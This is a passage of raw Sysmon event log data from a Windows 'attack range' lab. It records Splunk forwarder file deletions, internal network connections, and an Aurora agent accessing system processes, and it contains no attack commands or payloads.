Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000015701Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:15.517{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E996C964977D1C9AD2BCF9E74A41EA7D,SHA256=32F977E1C3D35880125334FA013631FC4BE387E06F0FEEE6B81BBF4E09CA1EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:15.396{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309416DA3B552703AEF4A933002E0F40,SHA256=4317A39DC3805C8B8ABB558E6546932DDD9B4302665D1467A9DA27FF7BCC0DFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015703Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:16.608{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CAB5DA17E06C710A4DAAB05CD5D2857,SHA256=75C75164F0E43CA2FDA7A164D89DC9C16846ED36D28F0809FCA57B94651AEE6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:16.464{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFC6C412E16E9E8C4CE618BCFC9CA1E,SHA256=4E6B483DC744C229CF45421179D8BA67230F75BE2311513DB1E5545059A6FC3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015702Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:16.376{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FDFB3F426FFC1B524710DDC8CF1C7F1D,SHA256=C81BD59B3E28F6AD56FA47215D1C6F73CC17348F865A27011739068F8EC31974,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015704Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:17.708{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C8C34EF47B3E09A146C6AA711ABA2A,SHA256=E3D31C5770E7962B2BDF8FFAEA9B76215F8CEB48C8E648326B2DDCF23EE564FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:17.534{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28E0837DA6B7E5F7FE579A480B4B6A8,SHA256=E53AE36B2E7ABA33E19275EC42471EF2619FA5A5384257A0036E5531B7A632C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:18.596{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5319193977965C873F8BA529702BDF05,SHA256=6F67494C7E01BCFD291038714F17612225031237226D35A6F82DB535B6261705,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015705Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:18.793{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E830101D92B39E9CA917F2B27879E2EE,SHA256=B2D2B9639AE4B301D987E953ADD76528102FB89983BD30D06D9AC9D384098B4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:19.672{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2789534D561C465D64B6EC8509FEA6,SHA256=AE92B485974C51CF0E117F5770CEF244CCFCF5BE9801F444FB7E3DD2C0CB8CF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015709Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:19.877{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0824F5583CADBB4A9976EE8BCFADA339,SHA256=33126767C4C6C6BD7A8B4EB884F8A7197C8C345228C2B9D5BEBFD0BA86F52D67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015708Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:19.768{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015707Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:19.768{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015706Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:19.768{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:20.775{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4472F0BD957AF30925C6FF5F03D23EF,SHA256=51CC6953DF8BF135132DDCE473F201574CB0F84EE71CAD55319C10DC2F6D84FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015711Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:20.964{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6731253DF3D54F75D23EC0D3C9C88ED4,SHA256=92392C876B910D2080810CC35A08A741699AA39452029801BDB42B57807208E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015710Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:17.005{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50064-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000040943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:18.550{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56260-false10.0.1.12-8000- 23542300x800000000000000040942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:21.855{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7CE203F47D70D1929C1512CC535BA42,SHA256=224ADDFEA50124C7240611FF9AF2C880711EDCA589DB8F448D45A0D89B787824,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:22.921{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC08F4D264CF93B88D99E17CFBCEF4F8,SHA256=4122B6149A61C08D97F0E0C7D050C2A99A362F2F1A7B64FB1FA849E194B63126,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015743Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.847{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015742Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.840{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015741Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.839{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015740Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.831{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015739Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.827{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015738Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.824{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015737Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.823{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015736Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.811{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015735Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.807{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015734Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.797{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015733Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.795{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015732Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.786{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015731Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.781{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015730Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015729Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.764{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015728Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015727Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program 